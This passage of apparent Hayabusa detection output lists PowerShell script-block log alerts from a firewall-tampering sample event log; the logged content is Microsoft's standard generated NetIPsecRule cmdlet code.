($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$tr",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$tr",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ue)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 